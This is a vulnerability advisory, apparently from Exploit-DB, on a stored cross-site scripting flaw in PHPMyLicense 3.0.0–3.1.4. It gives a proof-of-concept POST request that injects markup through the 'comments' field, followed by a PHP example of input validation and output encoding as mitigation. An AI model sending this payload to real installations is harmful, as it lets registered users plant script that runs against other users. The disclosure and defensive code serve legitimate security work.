Vendor: PHPMyLicense
By: Aria Akhavan Rezayat
CVSS: 8.8 (HIGH)
Vulnerability: Stored Cross Site Scripting
CWE: 79
Product Name: PHPMyLicense
Affected Version From: 3.0.0
Affected Version To: 3.1.4
Patch Exists: NO
Related CWE: None
CPE: a:phpmylicense:phpmylicense
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Webapps
Year: 2015

PHPMyLicense Stored Cross Site Scripting

Because user input is not filtered, any registered user can submit malicious code and disable the functionality of the whole application.

Mitigation:

No update is available.

Exploit-DB raw data:

Hello, I want to report the following exploit:


# Exploit Title: PHPMyLicense Stored Cross Site Scripting
# Date: 09-10-2015
# Exploit Author: Aria Akhavan Rezayat @ Websec GesmbH
# Website: https://websec-test.com
# Vendor Homepage: https://phpmylicense.com
# Software Link: http://codecanyon.net/item/phpmylicense/11719122
# Version: 3.0.0 - 3.1.4 (REQUIRED)
# Category: Webapps

1.) Description:

Any registered user can simply disable functionality of the whole application and input malicious code because of a lack of filtering.

2.) Proof of Concept:

localhost/phpmylicense/ajax/

POST:

comments=bla-->MaliciousCode<%21--&customer_email=bla&domain=bla&expirydate=26-10-2014&handler=newlicense&parameters=bla&productid=20&serialkey=bla&status=processing

3.) Solution:

None. - No Update available for it.
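
Since no vendor fix exists, the missing filtering can be compensated for by validating the `newlicense` fields on input and encoding them on output. The following is an added example, not PHPMyLicense code: `e()`, `validateNewLicense()`, `ALLOWED_STATUS`, the 1000-byte length cap and the assumption that the stored values are echoed into HTML text or quoted attributes are all hypothetical; only the field names come from the request above.

```php
<?php
declare(strict_types=1);

// Assumption: 'processing' is the only status value visible in the report.
const ALLOWED_STATUS = ['processing'];

// Encode a stored value for an HTML text or quoted-attribute context.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Validate the newlicense fields (names taken from the PoC request) and
// return the names of the fields that fail. Free-text fields only get a
// length cap here: they are stored as received and encoded with e() on output.
function validateNewLicense(array $post): array
{
    // Treat missing or non-string (e.g. array) parameters as empty strings.
    $s = fn(string $k): string => is_string($post[$k] ?? null) ? $post[$k] : '';
    $date = DateTime::createFromFormat('!d-m-Y', $s('expirydate'));
    $checks = [
        'customer_email' => filter_var($s('customer_email'), FILTER_VALIDATE_EMAIL) !== false,
        'productid'      => filter_var($s('productid'), FILTER_VALIDATE_INT,
                                ['options' => ['min_range' => 1]]) !== false,
        // Round-trip the date so overflowing values such as 31-02-2014 fail.
        'expirydate'     => $date !== false && $date->format('d-m-Y') === $s('expirydate'),
        'status'         => in_array($s('status'), ALLOWED_STATUS, true),
    ];
    foreach (['comments', 'parameters', 'serialkey', 'domain'] as $field) {
        $checks[$field] = strlen($s($field)) <= 1000; // hypothetical length cap
    }
    return array_keys(array_filter($checks, fn(bool $ok): bool => !$ok));
}

// Constructed input: the request body from the report, parsed as a form post.
parse_str('comments=bla-->MaliciousCode<%21--&customer_email=bla&domain=bla'
    . '&expirydate=26-10-2014&handler=newlicense&parameters=bla&productid=20'
    . '&serialkey=bla&status=processing', $post);

print_r(validateNewLicense($post)); // names of the fields that fail validation
echo e($post['comments']), PHP_EOL; // the comment as it should reach the page
```

Input validation alone does not neutralise the `comments` value, because it is legitimate free text; the output encoding is what keeps its `<` and `>` from being interpreted as markup. `htmlspecialchars()` covers HTML text and quoted attributes only, so values placed inside script blocks or URLs need context-specific encoding instead.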